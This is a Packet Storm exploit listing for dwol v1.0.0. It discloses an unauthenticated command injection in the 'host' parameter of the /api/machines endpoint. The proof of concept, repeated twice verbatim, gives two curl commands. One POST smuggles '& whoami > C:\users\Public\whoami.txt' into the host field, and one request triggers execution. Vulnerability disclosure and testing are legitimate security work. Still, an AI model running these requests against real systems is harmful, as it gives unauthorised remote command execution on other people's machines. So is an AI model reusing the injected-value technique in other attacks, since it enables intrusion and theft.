Description
dwol version 1.0.0 suffers from an unauthenticated command injection vulnerability in the host parameter of the /api/machines endpoint...
Basic Information
ID
PACKETSTORM:219284
Published
Apr 20, 2026 at 00:00
Affected Product
Affected Versions
# Exploit Title: dwol v1.0.0 - Unauthenticated Command Injection
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dwol
# Software Link:
https://github.com/dhjz/dwol/releases/download/1.0.0/dwol.exe.zip
# Version: 1.0.0
# Tested on: Windows 10, Windows 11
# Description:
dwol v1.0.0 is vulnerable to unauthenticated command injection
vulnerability in the 'host'
parameter of the /api/machines endpoint.
# Proof of Concept:
Step 1: Add a malicious machine with an injected command
curl -X POST "http://TARGET_IP:999/api/machines" -H "Content-Type:
application/json" -d
'{"id":"rce","name":"rce","mac":"00:11:22:33:44:55","host":"127.0.0.1 &
whoami > C:\\users\\Public\\whoami.txt","port":9}'
Step 2: Trigger the command execution
curl "http://TARGET_IP:999/api/status"
file is created in C:\\users\\Public\\
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dwol
# Software Link:
https://github.com/dhjz/dwol/releases/download/1.0.0/dwol.exe.zip
# Version: 1.0.0
# Tested on: Windows 10, Windows 11
# Description:
dwol v1.0.0 is vulnerable to unauthenticated command injection
vulnerability in the 'host'
parameter of the /api/machines endpoint.
# Proof of Concept:
Step 1: Add a malicious machine with an injected command
curl -X POST "http://TARGET_IP:999/api/machines" -H "Content-Type:
application/json" -d
'{"id":"rce","name":"rce","mac":"00:11:22:33:44:55","host":"127.0.0.1 &
whoami > C:\\users\\Public\\whoami.txt","port":9}'
Step 2: Trigger the command execution
curl "http://TARGET_IP:999/api/status"
file is created in C:\\users\\Public\\